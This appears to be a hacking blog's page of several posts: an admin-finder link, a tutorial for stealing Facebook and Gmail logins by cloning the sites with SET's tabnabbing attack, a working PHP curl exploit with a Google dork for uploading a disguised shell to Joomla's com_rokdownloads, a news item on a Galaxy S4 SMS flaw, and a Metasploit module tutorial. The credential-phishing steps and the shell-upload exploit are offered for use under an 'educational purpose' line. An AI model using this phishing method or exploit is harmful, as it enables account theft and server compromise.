How to use admin finder in backtrack 5r3

admin finder tool link =http://adf.ly/RHS8Z

Read More

Hack facebook account and Gmail account using Backtrack 5

Hack facebook account and Gmail account using Backtrack 5 In my previous tutorial I have explained “ How to hack facebook account using phishing ” , Now in this tutorial I am going to show you how to hack facebook account using backtrack 5. So just follow the simple steps. Open your backtrack 5’s terminal and type cd /pentest/exploits/set Now Open social Engineering Tool kit (SET) ./set Just hit ENTER and SET will Open , Now just select 1st option (1 Social-Engineering Attacks) and hit enter after that 2nd number (just type 2 as shown in snapshot) Now Just select 4th Option “Tabnabbing Attack Method” and Hit ENTER Then select 2nd option “Site Cloner” and Hit ENTER Now here you need to add the URL of Facebook (if you want to hack gmail then just add the gmail’s URL) Now just hit the enter. Open new terminal and just type ifconfig and hit ENTER Now just copy this IP address and open it in Browser. Now here I am just typing test email and password to see whether it works or not. Now just hit enter and switch back to our terminal and we found the Email and password ! This tutorial is just educational purpose

Read More

Joomla Rokdownloads Shell Upload

oomla Rokdownloads Shell Upload

Quote:#################################

# Exploit Title : joomla com_rokdownloads Components shell upload Vulnerability

# Software Link : http://www.joomla.org

# Security Risk : High

# Tested on : Linux

# Dork : inurl:administrator/components/com_rokdownloads

#################################
Exploit :

Post.php

<?php

$uploadfile="hit.php.gif";

$ch =
curl_init("http://www.exemple.com/administrator/components/com_rokdownloads/assets/uploadhandler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.exemple.com/images/stories/hit.php.gif

#################################

Read More

Serious Vulnerability in Samsung Galaxy S4

Serious security vulnerability was recently discovered on the Samsung flagship Galaxy S4 device, claiming that attackers can use it to silently send text messages.
A rogue mobile application could contain code exploiting the vulnerability to send fraudulent scam text messages ordering premium-rate services, the firm said.
By exploiting the vulnerable cloud backup feature, malware could pretend to be the identity of any contact, friend, relative, or organization when faking phishing SMS messages. When these phishing SMS messages are received, users may be tricked into clicking fraudulent links or disclosing sensitive personal information.

This particular vulnerability is related to the “cloud backup” feature of Galaxy S4, which is not properly protected and can be abused. From the study, malicious software could potentially exploit it to send fraudulent scam text messages (to order premium-rated services) or fake incoming SMS messages (for phishing).

Qihoo recommends S4 users temporarily disable the cloud backup feature when not in use. A temporary fix has also been made by Qihoo 360, and can be deactivated once the security flaw has been patched.

Read More

Adding your own exploits and modules in Metasploit

  Adding your own exploits and modules in Metasploit

 No not an exploit-dev 101 post but maybe an advanced tip for people new to using the Metasploit Framework. I see this question all the time so here is a little mini tutorial.

In Linux (For the love of god, don't run msf on Windows) when you install metasploit you get a hidden .msf(/home/$user/.msf) directory in your home directory.

It starts out empty, but this is where you want to place all updated exploit modules, auxiliary modules, meterpreter scripts, etc.

Why? Well if you start modifying exploits in the trunk when you do an update it will start bitching at you about it not being the same exploit and may possible overwrite your stuff and that's no fun.

Example time.

Say you want to add the "HP StorageWorks NSI Double Take Remote Overflow Exploit (meta)" exploit located on milworm. Its already in the trunk, so if you want to follow along you'll have to rm it.

What you have to do is create the same directory structure in your .msf folder as you have in your regular msf folder. So, looking at the exploit on milworm we see the path is:

class Exploits::Windows::Misc::Doubletake

So we cd into our .msf folder and create our modules folder (If you are lost, look at your regular msf folder and make a similar directory structure). Once we do that we need to create an exploits folder, a windows folder, and misc folder. Then we'll stick our doubletake.rb file into that folder.

cg@segfault:~/.msf3$ mkdir modules
cg@segfault:~/.msf3$ cd modules/
cg@segfault:~/.msf3/modules$ mkdir exploits
cg@segfault:~/.msf3/modules$ cd exploits/
cg@segfault:~/.msf3/modules/exploits$ mkdir windows
cg@segfault:~/.msf3/modules/exploits$ cd windows/
cg@segfault:~/.msf3/modules/exploits/windows$ mkdir misc
cg@segfault:~/.msf3/modules/exploits/windows$ cd misccg@segfault:~/.msf3/modules/exploits/windows/misc$ ls -l
total 4
-rw-r--r-- 1 cg cg 2277 2008-07-20 12:22 doubletake.rb
You don't need to mirror the directory structure completely, just add what you are adding. If you had Linux exploits you would add a linux folder in the exploits folder, since we don't its not necessary.

If everything worked right when you start the console you'll see one more exploit and you'll now be able use that exploit in the framework.

Before:

=[ msf v3.2-release
+ -- --=[ 302 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 73 aux

After:

=[ msf v3.2-release
+ -- --=[ 303 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 73 aux

Now we can use the exploit.

msf > use exploit/windows/misc/doubletake
msf exploit(doubletake) > info

Name: doubletake Overflow
Version: 9
Platform: Windows
Privileged: No
License: Metasploit Framework License

Provided by:
ri0t

Available targets:
Id Name
-- ----
0 doubletake 4.5.0
1 doubletake 4.4.2
2 doubletake 4.5.0.1819

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 1100 yes The target port

Payload information:
Space: 500
Avoid: 1 characters

Description:
This Module Exploits a stack overflow in the authentication
mechanism of NSI Doubletake which is also rebranded as hp storage
works Vulnerability found by Titon of Bastard Labs.

msf exploit(doubletake) >

same thing goes for auxiliary modules, just make an auxiliary folder in the modules directory and populate it accordingly. Pretty much the same thing for meterpreter scripts except the scripts aren't in the modules directory they are in their own, so in this case we'd make our scripts/meterpreter directories in the main .msf directory.

Read More